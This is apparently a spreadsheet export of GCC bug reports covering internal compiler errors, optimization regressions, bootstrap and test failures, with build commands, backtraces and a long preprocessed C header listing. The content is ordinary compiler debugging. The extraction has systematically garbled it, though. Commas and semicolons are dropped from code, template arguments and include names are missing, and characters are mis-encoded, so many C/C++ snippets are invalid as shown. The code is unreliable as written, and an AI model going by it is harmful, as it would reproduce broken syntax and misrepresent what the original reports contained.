$ grep trampoline n3.c.*nested
  struct __builtin_trampoline * D.1631
  D.1632 = __builtin_adjust_trampoline (D.1631)
  __builtin_init_trampoline (
In Ada nested subroutines are widely used and unneeded static chains are frequently being created by gcc: I first noticed this problem while bootstrapping the compiler with a patch that happened to print a warning in case n2.c: the warning fired hundreds of times during the Ada build.  The most common reason for this seems to be due to the instantiation of generic packages inside library level procedures.</t>
  </si>
  <si>
    <t>GCC-48553</t>
  </si>
  <si>
    <t>fmt FAILs on 32-bit Solaris 2 with stack overflow</t>
  </si>
  <si>
    <t>While investigating libgo failures I noticed that the fmt tests fails only
for 32-bit and if compiled without optimization.  The failure is like this:
=== RUN  fmt_test.TestScanInts
Segmentation Fault
With truss I see
23987/2:            Incurred fault #6 FLTBOUNDS  %pc = 0x080676B8
23987/2:              siginfo: SIGSEGV SEGV_MAPERR addr=0xCDF10FFC
23987/2:            Received signal #11 SIGSEGV [caught]
23987/2:              siginfo: SIGSEGV SEGV_MAPERR addr=0xCDF10FFC
which is exactly the lower bound of the thread stack:
CDF00000      64K rwx--    [ anon ]
CDF11000    1016K rwx-R    [ stack tid=2 ]
CE010000      64K rw---    [ anon ]
This matches the very deep nesting seen in gdb (ca. 4000 frames).
The test passes with -m64 (default thread stack size of 2 MB instead of 1 MB
for 32-bit) and with -O2.
Perhaps the nesting should be reduced to accomodate platforms without split
stack support?</t>
  </si>
  <si>
    <t>GCC-65369</t>
  </si>
  <si>
    <t>[5 Regression] nettle test failure on powerpc64le-linux-gnu when built with -O3</t>
  </si>
  <si>
    <t>seen with trunk r221254 works with -O3 on the 4.9 branch the following test fails with -O3 on the trunk:
hash input address: 0x100253b0451
Got:
dd4111dd66913ae2 f39adfbc438214d6
Expected:
e33b4ddc9c38f219 9c3e7b164fcc0536
Aborted (core dumped)
FAIL: md4
it's enough to build the md4.c file with -O2.</t>
  </si>
  <si>
    <t>GCC-69559</t>
  </si>
  <si>
    <t>incompatible system library/header other than the one in sysroot is used to build intermediate binaries in gcc bootstrap</t>
  </si>
  <si>
    <t>I ran into below error message at stage2 of bootstrap GCC:
/work/obj/gcc-bootstrap/./prev-gcc/xg++
-B/work/obj/gcc-bootstrap/./prev-gcc/ -B//aarch64-none-linux-gnu/bin/
-nostdinc++ -B/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/src/.libs
-B/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/libsupc++/.libs
 -I/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/include/aarch64-none-linux-gnu
 -I/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/include
 -I/src/gcc/libstdc++-v3/libsupc++
-L/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/src/.libs
-L/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/libsupc++/.libs
-c   -g -O2 -gtoggle -DIN_GCC     -fno-exceptions -fno-rtti
-fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings
-Wcast-qual -Wmissing-format-attribute -Woverloaded-virtual -pedantic
-Wno-long-long -Wno-variadic-macros -Wno-overlength-strings
-fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -fno-PIE -I. -Ibuild
-I/src/gcc/gcc -I/src/gcc/gcc/build -I/src/gcc/gcc/../include
-I/src/gcc/gcc/../libcpp/include  \
        -o build/genautomata.o /src/gcc/gcc/genautomata.c
In file included from /src/gcc/gcc/genautomata.c:116:0:
/work/obj/gcc-bootstrap/prev-aarch64-none-linux-gnu/libstdc++-v3/include/math.h:65:12:
error: â€˜constexpr bool std::isinf(double)â€™ conflicts with a previous
declaration
 using std::isinf
            ^~~~~
In file included from /usr/include/features.h:374:0
                 from /usr/include/stdio.h:27
                 from /src/gcc/gcc/system.h:46
                 from /src/gcc/gcc/genautomata.c:108:
/usr/include/aarch64-linux-gnu/bits/mathcalls.h:201:1: note: previous
declaration â€˜int isinf(double)â€™
 __MATHDECL_1 (intisinf (_Mdouble_ __value)) __attribute__ ((__const__))
 ^
I kind of understand what the problem is based on below facts:
1) I bootstrap gcc against new glibc
2) I configure gcc with --with-build-sysroot. According to GCC
document this only affects how target libraries are built.
3) binary executables are built in GCC for internal use purpose. These
binaries are used to generate internal files during building gcc and
I guess they are not considered as target library. So system C
libraries/headers are used.
4) at stage2 of gcc bootstrap these binaries are compiled by stage1
xg++ which by default uses new libstdc+ just built in stage1.
5) Problem the new libstdc++ is configured/built against new glibc
because of --with-build-sysroot. It's incompatible with system C
headers.
So is it reasonable to use --with-build-sysroot alone without --with-sysroot when bootstrapping gcc?  If yes
how should we build binaries in GCC?  Seems to me it's not reasonable
to use new libstdc++ along with system C library since it's built
against new glibc.
Any comments?  Thanks.</t>
  </si>
  <si>
    <t>GCC-2880</t>
  </si>
  <si>
    <t>[OS X] compilation of a python wrapper gives insn failure</t>
  </si>
  <si>
    <t>Compilation of some C python wrapper code fails 
due to:
glf23fmodule.c:154: Unrecognizable insn:
(insn 17 16 19 (set (reg/f:SI 82)
        (symbol_ref:SI (*LC0))) -1 (nil)
    (expr_list:REG_EQUAL (symbol_ref:SI (*LC0))
        (nil)))
Release:
gcc3.1 and Apple gcc2.95
Environment:
Darwin cubimac 1.3.2 Darwin Kernel Version 1.3.2: Fri Apr 27 22:50:58 PDT 2001 root:xnu/xnu-124.7.obj~1/RELEASE_PPC  Power Macintosh powerpc</t>
  </si>
  <si>
    <t>cary</t>
  </si>
  <si>
    <t>GCC-13430</t>
  </si>
  <si>
    <t>[3.4 regression] bb-reorder (the one done after reg stack) on takes too long</t>
  </si>
  <si>
    <t>The test case for PR12322 is not spending most of its time in GCSE.  In fact 
GCSE is _faster_ than 3.3.  The problem is that we enter a very long (and I 
suspect in fact an infinite) loop in bb-reorder. 
In particular bb-reorder.c:714: 
if ((e-&gt;src != ENTRY_BLOCK_PTR &amp;&amp; bbd[e-&gt;src-&gt;index].end_of_trace &gt;= 0) 
Honza bb-reorder is yours can you give this a look?</t>
  </si>
  <si>
    <t>zlomek</t>
  </si>
  <si>
    <t>GCC-66427</t>
  </si>
  <si>
    <t>The compiler rejects too complex variable templates</t>
  </si>
  <si>
    <t>I was trying to replace structures with a single value member by variable templates but it seems that their support still isn't complete enough to support my use case. I couldn't find a reasonable minimal example so here is the code that triggered the error:
#include 
struct plus {}
struct multiplies {}
// ...
template
constexpr T identity_element
template
constexpr int identity_element = 0
template
constexpr std::complex identity_element plus&gt; = {
    identity_element
    identity_element
}
And here are the generated error messages:
main.cpp:15:23: error: expected primary-expression before '' token
     identity_element
                       ^
main.cpp:15:29: error: expected primary-expression before '&gt;' token
     identity_element
                             ^
main.cpp:15:30: error: expected primary-expression before '' token
     identity_element
                              ^
main.cpp:16:23: error: expected primary-expression before '' token
     identity_element
                       ^
main.cpp:16:29: error: expected primary-expression before '&gt;' token
     identity_element
                             ^
main.cpp:17:1: error: expected primary-expression before '}' token
 }
 ^</t>
  </si>
  <si>
    <t>morwenn29</t>
  </si>
  <si>
    <t>GCC-64310</t>
  </si>
  <si>
    <t>libgcc2.c:2051:1: internal compiler error: in curr_insn_transform at lra-constraints.c:3383</t>
  </si>
  <si>
    <t>Building the arm-rtems target leads to this ICE:
/scratch/git-build/b-gcc-git-arm-rtems4.11/./gcc/xgcc -B/scratch/git-build/b-gcc-git-arm-rtems4.11/./gcc/ -nostdinc -B/scratch/git-build/b-gcc-git-arm-rtems4.11/arm-rtems4.11/newlib/ -isystem /scratch/git-build/b-gcc-git-arm-rtems4.11/arm-rtems4.11/newlib/targ-include -isystem /home/sh/archive/gcc-git/newlib/libc/include -B/opt/rtems-4.11/arm-rtems4.11/bin/ -B/opt/rtems-4.11/arm-rtems4.11/lib/ -isystem /opt/rtems-4.11/arm-rtems4.11/include -isystem /opt/rtems-4.11/arm-rtems4.11/sys-include    -g -O2 -mthumb -march=armv7-r -mfpu=vfpv3-d16 -mfloat-abi=hard -O2 -I/home/sh/archive/gcc-git/libgcc/../newlib/libc/sys/rtems/include -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fno-inline -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -fno-inline -I. -I. -I../../../../../.././gcc -I/home/sh/archive/gcc-git/libgcc -I/home/sh/archive/gcc-git/libgcc/. -I/home/sh/archive/gcc-git/libgcc/../gcc -I/home/sh/archive/gcc-git/libgcc/../include  -DHAVE_CC_TLS  -o _divdc3.o -MT _divdc3.o -MD -MP -MF _divdc3.dep -DL_divdc3 -c /home/sh/archive/gcc-git/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
/home/sh/archive/gcc-git/libgcc/libgcc2.c: In function '__divdc3':
/home/sh/archive/gcc-git/libgcc/libgcc2.c:2051:1: error: unable to generate reloads for:
 }
 ^
(insn 29 27 30 3 (set (reg/v:DF 120 [ denom ])
        (plus:DF (mult:DF (reg/v:DF 191 [ c ])
                (reg/v:DF 118 [ ratio ]))
            (reg/v:DF 192 [ d ]))) /home/sh/archive/gcc-git/libgcc/libgcc2.c:2011 643 {*muldf3adddf_vfp}
     (nil))
/home/sh/archive/gcc-git/libgcc/libgcc2.c:2051:1: internal compiler error: in curr_insn_transform at lra-constraints.c:3383
0x8e9f85 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /home/sh/archive/gcc-git/gcc/rtl-error.c:110
0x81c7b7 curr_insn_transform
        /home/sh/archive/gcc-git/gcc/lra-constraints.c:3383
0x81d39e lra_constraints(bool)
        /home/sh/archive/gcc-git/gcc/lra-constraints.c:4324
0x80dbf4 lra(_IO_FILE*)
        /home/sh/archive/gcc-git/gcc/lra.c:2277
0x7cca89 do_reload
        /home/sh/archive/gcc-git/gcc/ira.c:5391
0x7cca89 execute
        /home/sh/archive/gcc-git/gcc/ira.c:5561
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>sebastian.huber</t>
  </si>
  <si>
    <t>GCC-44196</t>
  </si>
  <si>
    <t>lto1: ICE: tree check: expected field_decl have type_decl in gimple_types_compatible_p at gimple.c:3597</t>
  </si>
  <si>
    <t>When trying to compile and link the attached file bug_lto.ii with LTO the link process dies with the message lto1: internal compiler error: Segmentation fault
Everything is fine if I do not use -flto for linking the shared library.
Command line that triggers the bug:
$ /home/martinkr/Programme/compilers/bin/g++ -flto -fPIC -o bug_lto.o -c bug_lto.ii 
$ /home/martinkr/Programme/compilers/bin/g++ -flto -fPIC -shared -o libdummy.so bug_lto.o
lto1: internal compiler error: Segmentation fault
lto-wrapper: /home/martinkr/Programme/compilers/bin/g++ returned 1 exit status
collect2: lto-wrapper returned 1 exit status
$ /home/martinkr/Programme/compilers/bin/g++ -v
Using built-in specs.
COLLECT_GCC=/home/martinkr/Programme/compilers/bin/g++
COLLECT_LTO_WRAPPER=/home/martinkr/Programme/compilers/libexec/gcc/x86_64-linux-gnu/4.5.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../configure --enable-languages=cc++fortranobjcobj-c++ --prefix=/home/martinkr/Programme/compilers --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --without-included-gettext --enable-threads=posix --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i486 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu --with-cpu=core2
Thread model: posix
gcc version 4.5.1 20100513 (prerelease) (GCC) 
The error is also present in the 4.5.0 release.</t>
  </si>
  <si>
    <t>martin.kronbichler</t>
  </si>
  <si>
    <t>GCC-41046</t>
  </si>
  <si>
    <t>decNumber leaves printf call in libgcc</t>
  </si>
  <si>
    <t>The decNumber package has debugging code with calls to printf.  Most of those calls are protected by DECCHECK or DECTRACE but a couple of them are not.  The printf calls should not be in the normal build of libgcc.
I'm about to submit a fix but want a PR to keep track of this issue.</t>
  </si>
  <si>
    <t>GCC-36782</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] SH: spill failure in class 'R0_REGS' with -fpic</t>
  </si>
  <si>
    <t>gcc-4.3.0 fail to compile php-5.2.5 with this message.
gcc-4.1.3 can compile without failure.
It's similar to Bug #36684 But -fno-schedule-insns option doesn't help.
I can comiple when I down optimization level (remove -O2).
Is this simply -fno-schedule-insns is ignored by other option ?
/bin/sh /builddir/build/BUILD/php-5.2.5/build-cgi/libtool --silent --preserve-dup-deps --mode=compile gcc  -Iext/spl/ -I/builddir/build/BUILD/php-5.2.5/ext/spl/ -DPHP_ATOM_INC -I/builddir/build/BUILD/php-5.2.5/build-cgi/include -I/builddir/build/BUILD/php-5.2.5/build-cgi/main -I/builddir/build/BUILD/php-5.2.5 -I/usr/include/libxml2 -I/usr/kerberos/include -I/builddir/build/BUILD/php-5.2.5/build-cgi/ext/date/lib -I/builddir/build/BUILD/php-5.2.5/ext/date/lib -I/usr/include/freetype2 -I/usr/include/imap -I/builddir/build/BUILD/php-5.2.5/ext/mbstring/oniguruma -I/builddir/build/BUILD/php-5.2.5/build-cgi/ext/mbstring/oniguruma -I/builddir/build/BUILD/php-5.2.5/ext/mbstring/libmbfl -I/builddir/build/BUILD/php-5.2.5/build-cgi/ext/mbstring/libmbfl -I/builddir/build/BUILD/php-5.2.5/ext/mbstring/libmbfl/mbfl -I/builddir/build/BUILD/php-5.2.5/build-cgi/ext/mbstring/libmbfl/mbfl -I/usr/include/mysql -I/usr/include/ncurses -I/usr/include/pspell -I/builddir/build/BUILD/php-5.2.5/build-cgi/TSRM -I/builddir/build/BUILD/php-5.2.5/build-cgi/Zend -I/builddir/build/BUILD/php-5.2.5/main -I/builddir/build/BUILD/php-5.2.5/Zend -I/builddir/build/BUILD/php-5.2.5/TSRM -I/builddir/build/BUILD/php-5.2.5/build-cgi/    -I/usr/include -O2 -g -mieee -fno-strict-aliasing -Wno-pointer-sign -fno-schedule-insns  -c /builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c -o ext/spl/spl_observer.lo
/builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c: In function 'spl_SplObjectStorage_new':
/builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c:124: error: unable to find a register to spill in class 'R0_REGS'
/builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c:124: error: this is the insn:
(insn:HI 99 105 92 2 /builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c:124 (set (reg:SI 1 r1 [+4 ])
        (mem/u/c:SI (plus:SI (reg/f:SI 1 r1 [202])
                (reg:SI 12 r12)) [0 S4 A32])) 172 {movsi_ie} (expr_list:REG_EQUAL (symbol_ref:SI (spl_handler_SplObjectStorage) )
        (expr_list:REG_DEAD (reg/f:SI 1 r1 [202])
            (nil))))
/builddir/build/BUILD/php-5.2.5/ext/spl/spl_observer.c:124: confused by earlier errors bailing out
Preprocessed source stored into /tmp/ccY9MS2w.out file please attach this to your bugreport.
make: *** [ext/spl/spl_observer.lo] Error 1
# /usr/bin/gcc -v
Using built-in specs.
Target: sh4-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla
--enable-bootstrap --enable-shared --enable-threads=posix
--enable-checking=release --with-system-zlib --enable-__cxa_atexit
--disable-libunwind-exceptions
--enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk
--disable-dssi --enable-plugin
--with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre
--enable-libgcj-multifile --enable-java-maintainer-mode
--with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib
--build=sh4-redhat-linux
Thread model: posix
gcc version 4.3.0 20080404 (Red Hat 4.3.0-6.fs1.1) (GCC)</t>
  </si>
  <si>
    <t>GCC-4093</t>
  </si>
  <si>
    <t>Return type mis-match for (a?b:c) constructs in gcc/cp/cp-tree.h</t>
  </si>
  <si>
    <t>HP-UX's ANSI C compiler likes the conditional (a?b:c) construct
to have matching types for the return values b and c (which
is sensible you'd agree :-) ). In gcc/cp/cp-tree.h there
is a mismatch in the #define's for SET_BINFO_MARKED()
CLEAR_BINFO_MARKED() SET_BINFO_VTABLE_PATH_MARKED() and
CLEAR_BINFO_VTABLE_PATH_MARKED() (lines 1668 1669 1674
and 1675).
It turns out that the true part (b if you like)
returns a (void) but the false part (c) doesn't.
Release:
unknown
Environment:
HP-UX 11.00 (may apply to other platforms with strict
ANSI C compilers)
How-To-Repeat:
Compile gcc 3.0.1 with a strict ANSI C compiler - I used
the HP-UX 11.00 HP ANSI C compiler for this.</t>
  </si>
  <si>
    <t>rkl</t>
  </si>
  <si>
    <t>GCC-68806</t>
  </si>
  <si>
    <t>[6 Regression] internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>Created attachment 36967
Preprocessed source as generated by -freport-bug
/home/jamrial/x265/source/common/pixel.cpp: In function â€˜int {anonymous}::sad(const pixel* intptr_t const pixel* intptr_t) [with int lx = 12 int ly = 16]â€™:
/home/jamrial/x265/source/common/pixel.cpp:40:5: internal compiler error: Segmentation fault
 int sad(const pixel* pix1 intptr_t stride_pix1 const pixel* pix2 intptr_t stride_pix2)
     ^~~
0xcd660f crash_signal
        /home/jamrial/gcc-svn/gcc/toplev.c:334
0x5b8f7d vec::operator[](unsigned int)
        /home/jamrial/gcc-svn/gcc/vec.h:1180
0x5b8f7d vect_create_epilog_for_reduction
        /home/jamrial/gcc-svn/gcc/tree-vect-loop.c:5000
0xf1cc4a vectorizable_reduction(gimple* gimple_stmt_iterator* gimple** _slp_tree*)
        /home/jamrial/gcc-svn/gcc/tree-vect-loop.c:6172
0xf14550 vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
        /home/jamrial/gcc-svn/gcc/tree-vect-stmts.c:8224
0xf1a544 vect_transform_loop(_loop_vec_info*)
        /home/jamrial/gcc-svn/gcc/tree-vect-loop.c:6865
0xf35f97 vectorize_loops()
        /home/jamrial/gcc-svn/gcc/tree-vectorizer.c:554
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-14510</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Lookup error between function name and struct name</t>
  </si>
  <si>
    <t>I believe that there is no second declaration of the struct t_bind in the 
following example. Therefore a rejection of the source code is not warranted. I 
guess this is a regression. This example is taken from the current Ace 
distribution. 
g++ -v s.C 
Reading specs from /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/specs 
Configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc
++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug 
Thread model: posix 
gcc version 3.4.0 20040309 (prerelease) 
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4.0/cc1plus -quiet -v -D_GNU_SOURCE 
s.C -quiet -dumpbase s.C -mtune=pentiumpro -auxbase s -version -o /tmp/
ccUovTPT.s 
ignoring nonexistent directory NONE/include 
ignoring nonexistent directory /usr/local/lib/gcc/
i686-pc-linux-gnu/3.4.0/../../../../i686-pc-linux-gnu/include 
#include ... search starts here: 
#include  search starts here: 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/
i686-pc-linux-gnu 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/
backward 
 /usr/local/include 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/include 
 /usr/include 
End of search list. 
GNU C++ version 3.4.0 20040309 (prerelease) (i686-pc-linux-gnu) 
        compiled by GNU C version 3.4.0 20040309 (prerelease). 
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64274 
s.C:8: error: conflicting declaration 'struct t_bind' 
s.C:1: error: 'struct t_bind' has a previous declaration as `struct t_bind' 
s.C:8: error: `int ACE_OS::t_bind(t_bind*)' should have been declared inside 
`ACE_OS' 
source code s.C 
struct t_bind { } 
namespace ACE_OS 
{ 
  extern int t_bind (struct t_bind *req) 
} 
inline int ACE_OS::t_bind (struct t_bind *req) { }</t>
  </si>
  <si>
    <t>GCC-12235</t>
  </si>
  <si>
    <t>-fomit-frame-pointer causes C++ exception not to be caught properly</t>
  </si>
  <si>
    <t>If you compile bugrep1.ii with options:-fomit-frame-pointer -O
then the exception raised in foo() isn't caught by the try-catch block in
main(). In this case the program quits with message:Aborted. 
	However if I compile it without the -fomit-frame-pointer
option then the exception is caught in main's try-catch
block.In this case the program quits with message:Exception caught:.
	So I think the problem is -fomit-frame-pointer doesn't creates a
correct stack frame or doesn't even create one and thus when unwinding the
stack the program can't find the try-catch block. Throwing still works
because I have single-stepped in the program and seen that the cxa_throw()
function is called. I think gcc should issue at least a warning because it 
does generate incorrect code
	 This bug occurs both with g++ and gcc. 
//preprocessor output bugrep1.ii
# 1 bugrep1.cpp
# 1 
# 1 
# 1 bugrep1.cpp
# 14 bugrep1.cpp
# 1 /usr/include/stdio.h 1 3
# 28 /usr/include/stdio.h 3
# 1 /usr/include/features.h 1 3
# 291 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 292 /usr/include/features.h 2 3
# 314 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 315 /usr/include/features.h 2 3
# 29 /usr/include/stdio.h 2 3
extern C {
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 213 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 3
typedef unsigned int size_t
# 35 /usr/include/stdio.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 28 /usr/include/bits/types.h 3
# 1 /usr/include/bits/wordsize.h 1 3
# 29 /usr/include/bits/types.h 2 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 32 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short int __u_short
typedef unsigned int __u_int
typedef unsigned long int __u_long
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
__extension__ typedef long long int __quad_t
__extension__ typedef unsigned long long int __u_quad_t
# 128 /usr/include/bits/types.h 3
# 1 /usr/include/bits/typesizes.h 1 3
# 129 /usr/include/bits/types.h 2 3
typedef unsigned long long int __dev_t
typedef unsigned int __uid_t
typedef unsigned int __gid_t
typedef unsigned long int __ino_t
typedef unsigned long long int __ino64_t
typedef unsigned int __mode_t
typedef unsigned int __nlink_t
typedef long int __off_t
typedef long long int __off64_t
typedef int __pid_t
typedef struct { int __val[2] } __fsid_t
typedef long int __clock_t
typedef unsigned long int __rlim_t
typedef unsigned long long int __rlim64_t
typedef unsigned int __id_t
typedef long int __time_t
typedef unsigned int __useconds_t
typedef long int __suseconds_t
typedef int __daddr_t
typedef long int __swblk_t
typedef int __key_t
typedef int __clockid_t
typedef int __timer_t
typedef long int __blksize_t
typedef long int __blkcnt_t
typedef long long int __blkcnt64_t
typedef unsigned long int __fsblkcnt_t
typedef unsigned long long int __fsblkcnt64_t
typedef unsigned long int __fsfilcnt_t
typedef unsigned long long int __fsfilcnt64_t
typedef int __ssize_t
typedef __off64_t __loff_t
typedef __quad_t *__qaddr_t
typedef char *__caddr_t
typedef int __intptr_t
typedef unsigned int __socklen_t
# 37 /usr/include/stdio.h 2 3
typedef struct _IO_FILE FILE
# 62 /usr/include/stdio.h 3
typedef struct _IO_FILE __FILE
# 72 /usr/include/stdio.h 3
# 1 /usr/include/libio.h 1 3
# 32 /usr/include/libio.h 3
# 1 /usr/include/_G_config.h 1 3
# 14 /usr/include/_G_config.h 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 354 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 3
typedef unsigned int wint_t
# 15 /usr/include/_G_config.h 2 3
# 24 /usr/include/_G_config.h 3
# 1 /usr/include/wchar.h 1 3
# 48 /usr/include/wchar.h 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 49 /usr/include/wchar.h 2 3
# 1 /usr/include/bits/wchar.h 1 3
# 51 /usr/include/wchar.h 2 3
# 63 /usr/include/wchar.h 3
typedef struct
{
  int __count
  union
  {
    wint_t __wch
    char __wchb[4]
  } __value
} __mbstate_t
# 25 /usr/include/_G_config.h 2 3
typedef struct
{
  __off_t __pos
  __mbstate_t __state
} _G_fpos_t
typedef struct
{
  __off64_t __pos
  __mbstate_t __state
} _G_fpos64_t
# 44 /usr/include/_G_config.h 3
# 1 /usr/include/gconv.h 1 3
# 28 /usr/include/gconv.h 3
# 1 /usr/include/wchar.h 1 3
# 48 /usr/include/wchar.h 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 49 /usr/include/wchar.h 2 3
# 63 /usr/include/wchar.h 3
# 29 /usr/include/gconv.h 2 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stddef.h 1 3
# 32 /usr/include/gconv.h 2 3
enum
{
  __GCONV_OK = 0
  __GCONV_NOCONV
  __GCONV_NODB
  __GCONV_NOMEM
  __GCONV_EMPTY_INPUT
  __GCONV_FULL_OUTPUT
  __GCONV_ILLEGAL_INPUT
  __GCONV_INCOMPLETE_INPUT
  __GCONV_ILLEGAL_DESCRIPTOR
  __GCONV_INTERNAL_ERROR
}
enum
{
  __GCONV_IS_LAST = 0x0001
  __GCONV_IGNORE_ERRORS = 0x0002
}
struct __gconv_step
struct __gconv_step_data
struct __gconv_loaded_object
struct __gconv_trans_data
typedef int (*__gconv_fct) (struct __gconv_step * struct __gconv_step_data *
                            __const unsigned char ** __const unsigned char *
                            unsigned char ** size_t * int int)
typedef wint_t (*__gconv_btowc_fct) (struct __gconv_step * unsigned char)
typedef int (*__gconv_init_fct) (struct __gconv_step *)
typedef void (*__gconv_end_fct) (struct __gconv_step *)
typedef int (*__gconv_trans_fct) (struct __gconv_step *
                                  struct __gconv_step_data * void *
                                  __const unsigned char *
                                  __const unsigned char **
                                  __const unsigned char * unsigned char **
                                  size_t *)
typedef int (*__gconv_trans_context_fct) (void * __const unsigned char *
                                          __const unsigned char *
                                          unsigned char * unsigned char *)
typedef int (*__gconv_trans_query_fct) (__const char * __const char ***
                                        size_t *)
typedef int (*__gconv_trans_init_fct) (void ** const char *)
typedef void (*__gconv_trans_end_fct) (void *)
struct __gconv_trans_data
{
  __gconv_trans_fct __trans_fct
  __gconv_trans_context_fct __trans_context_fct
  __gconv_trans_end_fct __trans_end_fct
  void *__data
  struct __gconv_trans_data *__next
}
struct __gconv_step
{
  struct __gconv_loaded_object *__shlib_handle
  __const char *__modname
  int __counter
  char *__from_name
  char *__to_name
  __gconv_fct __fct
  __gconv_btowc_fct __btowc_fct
  __gconv_init_fct __init_fct
  __gconv_end_fct __end_fct
  int __min_needed_from
  int __max_needed_from
  int __min_needed_to
  int __max_needed_to
  int __stateful
  void *__data
}
struct __gconv_step_data
{
  unsigned char *__outbuf
  unsigned char *__outbufend
  int __flags
  int __invocation_counter
  int __internal_use
  __mbstate_t *__statep
  __mbstate_t __state
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data []
} *__gconv_t
# 45 /usr/include/_G_config.h 2 3
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 33 /usr/include/libio.h 2 3
# 53 /usr/include/libio.h 3
# 1 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stdarg.h 1 3
# 43 /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/stdarg.h 3
typedef __builtin_va_list __gnuc_va_list
# 54 /usr/include/libio.h 2 3
# 162 /usr/include/libio.h 3
struct _IO_jump_t struct _IO_FILE
# 172 /usr/include/libio.h 3
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 195 /usr/include/libio.h 3
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 263 /usr/include/libio.h 3
struct _IO_FILE {
  int _flags
  char* _IO_read_ptr
  char* _IO_read_end
  char* _IO_read_base
  char* _IO_write_base
  char* _IO_write_ptr
  char* _IO_write_end
  char* _IO_buf_base
  char* _IO_buf_end
  char *_IO_save_base
  char *_IO_backup_base
  char *_IO_save_end
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _flags2
  __off_t _old_offset
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
# 311 /usr/include/libio.h 3
  __off64_t _offset
  void *__pad1
  void *__pad2
  int _mode
